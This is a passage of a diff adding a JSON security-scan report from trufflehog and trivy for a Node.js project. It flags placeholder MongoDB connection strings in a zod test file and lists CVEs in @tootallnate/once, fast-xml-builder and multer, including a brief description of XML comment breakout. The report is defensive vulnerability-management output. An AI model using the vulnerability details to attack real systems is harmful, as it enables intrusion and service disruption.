1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9491b5fd54f57cb2", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "startLine": 0 + }, + "message": "mongodb://username:password@host:1234/?authSource=admin", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "line": 651 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://username:password@host:1234/?authSource=admin", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f911dc46b3477b87", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "startLine": 0 + }, + "message": "mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "line": 652 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7e52e475110f77c7", + "ruleId": "CVE-2026-3449", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", + "title": "CVE-2026-3449", + "description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-3449", + "references": [], + "tags": [ + "vulnerability", + "pkg:@tootallnate/once@2.0.0" + ], + "risk": { + "cwe": [ + "CWE-705" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-3449", + "VendorIDs": [ + "GHSA-vpq2-c234-7xj6" + ], + "PkgID": "@tootallnate/once@2.0.0", + "PkgName": "@tootallnate/once", + "PkgIdentifier": { + "PURL": "pkg:npm/%40tootallnate/once@2.0.0", + "UID": "22f57853d23edc3a" + }, + "InstalledVersion": "2.0.0", + "FixedVersion": "3.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109", + "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", + "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", + "Severity": "LOW", + "CweIDs": [ + "CWE-705" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", + "V3Score": 3.3, + "V40Score": 1.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3449", + "https://github.com/TooTallNate/once", + "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", + "https://github.com/TooTallNate/once/issues/8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", + "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", + "https://www.cve.org/CVERecord?id=CVE-2026-3449" + ], + "PublishedDate": "2026-03-03T05:17:25.017Z", + "LastModifiedDate": "2026-05-19T15:38:48.397Z" + }, + "context": { + "sbom": { + "name": "@tootallnate/once", + "version": "2.0.0", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.671466666666666, + "epss": 0.00018, + "epss_percentile": 0.04653, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.00072, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3bc7bf0933f4ab4f", + "ruleId": "CVE-2026-44665", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", + "title": "CVE-2026-44665", + "description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44665", + "references": [], + "tags": [ + "vulnerability", + "pkg:fast-xml-builder@1.1.5" + ], + "risk": { + "cwe": [ + "CWE-91" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44665", + "VendorIDs": [ + "GHSA-5wm8-gmm8-39j9" + ], + "PkgID": "fast-xml-builder@1.1.5", + "PkgName": "fast-xml-builder", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-builder@1.1.5", + "UID": "e589910a79395ad7" + }, + "InstalledVersion": "1.1.5", + "FixedVersion": "1.1.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44665", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763", + "Title": "fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content manipulation", + "Description": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-91" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V3Score": 6.1, + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-44665", + "https://github.com/NaturalIntelligence/fast-xml-builder", + "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44665", + "https://www.cve.org/CVERecord?id=CVE-2026-44665" + ], + "PublishedDate": "2026-05-13T16:16:59.093Z", + "LastModifiedDate": "2026-05-18T16:16:31.7Z" + }, + "context": { + "sbom": { + "name": "fast-xml-builder", + "version": "1.1.5", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A03:2021" + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.362266666666663, + "epss": 0.00031, + "epss_percentile": 0.09168, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00124, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "291094d0af7c4e5d", + "ruleId": "CVE-2026-44664", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", + "title": "CVE-2026-44664", + "description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., --->...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44664", + "references": [], + "tags": [ + "vulnerability", + "pkg:fast-xml-builder@1.1.5" + ], + "risk": { + "cwe": [ + "CWE-91" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44664", + "VendorIDs": [ + "GHSA-45c6-75p6-83cc" + ], + "PkgID": "fast-xml-builder@1.1.5", + "PkgName": "fast-xml-builder", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-builder@1.1.5", + "UID": "e589910a79395ad7" + }, + "InstalledVersion": "1.1.5", + "FixedVersion": "1.1.6", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44664", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80", + "Title": "fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XML comments", + "Description": "fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, '- -'). This skip the values containing three consecutive dashes (e.g., --->...), allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML content. This vulnerability is fixed in 1.1.6.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-91" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-44664", + "https://github.com/NaturalIntelligence/fast-xml-builder", + "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44664", + "https://www.cve.org/CVERecord?id=CVE-2026-44664" + ], + "PublishedDate": "2026-05-13T16:16:58.937Z", + "LastModifiedDate": "2026-05-13T16:58:09.717Z" + }, + "context": { + "sbom": { + "name": "fast-xml-builder", + "version": "1.1.5", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A03:2021" + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.349866666666665, + "epss": 0.00031, + "epss_percentile": 0.09168, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00124, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "56ac1677596b7698", + "ruleId": "CVE-2025-47935", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", + "title": "CVE-2025-47935", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-47935", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-401" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-47935", + "VendorIDs": [ + "GHSA-44fp-w29j-9vj5" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47935", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b", + "Title": "Multer vulnerable to Denial of Service via memory leaks from unclosed streams", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-401" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", + "https://github.com/expressjs/multer/pull/1120", + "https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5", + "https://nvd.nist.gov/vuln/detail/CVE-2025-47935" + ], + "PublishedDate": "2025-05-19T20:15:25.863Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.498533333333334, + "epss": 0.00177, + "epss_percentile": 0.38785, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00708, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9a2891a28bad4ab6", + "ruleId": "CVE-2025-47944", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Multer vulnerable to Denial of Service from maliciously crafted requests", + "title": "CVE-2025-47944", + "description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-47944", + "references": [], + "tags": [ + "vulnerability", + "pkg:multer@1.4.5-lts.2" + ], + "risk": { + "cwe": [ + "CWE-248" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-47944", + "VendorIDs": [ + "GHSA-4pg4-qvpc-4q3h" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "99f2d2a7a48c940f" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-47944", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598", + "Title": "Multer vulnerable to Denial of Service from maliciously crafted requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", + "https://github.com/expressjs/multer/issues/1176", + "https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h", + "https://nvd.nist.gov/vuln/detail/CVE-2025-47944" + ], + "PublishedDate": "2025-05-19T20:15:26.007Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + "context": { + "sbom": { + "name": "multer", + "version": "1.4.5-lts.2", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.371600000000004, + "epss": 0.00041, + "epss_percentile": 0.12343, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.00164, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d58f5341093c2113", + "ruleId": "CVE-2025-48997", + "severity": "HIGH", + 